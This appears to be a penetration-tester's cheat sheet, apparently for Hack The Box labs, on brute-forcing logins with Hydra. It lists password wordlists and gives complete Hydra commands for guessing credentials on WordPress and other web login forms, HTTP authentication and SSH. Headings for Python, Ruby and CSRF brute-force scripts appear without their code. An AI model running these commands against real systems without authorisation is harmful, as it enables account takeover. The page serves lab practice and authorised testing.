Hydra Brutes

Hydra Brute Force

  • If login attempts give an "Invalid Username"

  • We can Brute-Force based on this error

  • You could use Burp for the keywords first (if you need it)

  • Wordlist (common passwords)

    • /usr/share/dirb/wordlists/common.txt

    • 10k_most_common.txt ..faster than rockyou, but decent!

    • .. SecLists/Passwords/Leaked-Databases/rockyou.txt

    • .. SecLists/Passwords/twitter-banned.txt ..small list of good pws

---------------------------
wordpress/blog
> hydra -vV -L users.dic -p wedontcare 192.x.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:=Invalid username"
> hydra -vV -l admin -P dict.txt -f -t 2 10.x.x.x http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect"
> hydra -vV -l admin -P /usr/share/wordlists/rockyou.txt -f -t 64 10.x.x.x http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"
---------------------------

web-form-login
> hydra -t 1 -l admin -P common.txt -vV http-get://192.x.x.x/admin
> hydra -t 1 -l admin -P rockyou.txt -vV http-get://192.x.x.x/nibbleblog/admin.php

---------------------------
ssh
hydra -L users.txt -P pass.txt ssh://10.x.x.x

-t 64  ..if you want to speed up threads  !!!!

Trim your wordlist

  • Example: Pull everything with 'nibble' in the word and.. try ONLY these

REF: Fuzzing, Wordpress

Patator

Python Brute Force Starter Script:

Python Brute Loop:

Ruby Brute Loop

  • Ruby Script for passwords on MongoDBInjection

  • Test every letter to see if it matches the 'first' letter/set

Brute CSRF Python

  • Scrape the page and get the csrf token

  • REF: SenseHTB ippsec, pfsense

Last updated

Was this helpful?